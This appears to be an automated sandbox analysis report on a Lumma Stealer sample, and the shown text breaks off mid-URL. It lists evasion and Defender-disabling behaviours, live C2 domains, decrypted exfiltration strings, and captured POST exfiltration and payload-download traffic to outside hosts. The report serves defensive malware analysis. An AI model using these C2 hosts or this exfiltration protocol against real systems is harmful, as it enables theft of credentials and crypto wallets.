Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543581
MD5: 65397ed2ae0567709b177f41d0668597
SHA1: 1af8432aef5af0655dc6952fcbac893adae53880
SHA256: ba91baa187e8253acfb92cb60be2a1c99cb9809f4156475bd12a08e6fb69ed06
Tags: exeuser-Bitsight
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: file.exe.4936.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["fadehairucw.store", "crisiwarny.store", "necklacedmny.store", "navygenerayk.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "Kav--"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: scriptyprefej.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: navygenerayk.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: founpiuer.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: necklacedmny.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: thumbystriw.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: fadehairucw.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: crisiwarny.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: presticitpo.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: presticitpo.store
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: Workgroup: -
Source: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp String decryptor: 4SD0y4--legendaryy
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0088D7F8 CryptUnprotectData, 0_2_0088D7F8
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000003.1733973050.0000000004B70000.00000004.00001000.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+75E07B5Ch] 0_2_0087EC20
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp ecx 0_2_0088104F
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h 0_2_008B4C40
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-42h] 0_2_0087E1A0
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp eax 0_2_008AE210
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-0000008Ah] 0_2_0087CF90
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx eax, byte ptr [esp+edx+6D44C030h] 0_2_0089AB20
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h 0_2_0089AB20
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 0_2_00875890
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+6D44C02Ch] 0_2_008AFC90
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp ecx 0_2_008814CE
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+38h] 0_2_0088E07E
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov word ptr [ebp+edx*4+00h], ax 0_2_0087BD50
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h] 0_2_0087BD50
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp ecx 0_2_00898290
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h] 0_2_008B3A90
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov word ptr [edx], bp 0_2_00891EC5
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov word ptr [ecx], di 0_2_00891EC5
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp edx 0_2_00878EF0
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then and esi, 001FF800h 0_2_00874BA0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49710 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49713 -> 104.21.95.91:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 28 Oct 2024 06:18:42 GMTContent-Type: application/octet-streamContent-Length: 2869760Last-Modified: Mon, 28 Oct 2024 06:09:16 GMTConnection: keep-aliveETag: "671f2a8c-2bca00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2c 00 00 04 00 00 ab 54 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 69 73 79 67 77 67 78 00 80 2b 00 00 a0 00 00 00 6a 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 64 72 62 67 61 71 79 00 20 00 00 00 20 2c 00 00 04 00 00 00 a4 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2c 00 00 22 00 00 00 a8 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.95.91 104.21.95.91
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49717 -> 185.215.113.16:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12851Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15080Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20247Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569693Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: file.exe, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/U
Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/j
Source: file.exe, file.exe, 00000000.00000002.1724361364.0000000000C7A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe0
Source: file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe2
Source: file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeR
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1566909072.0000000000E02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.s
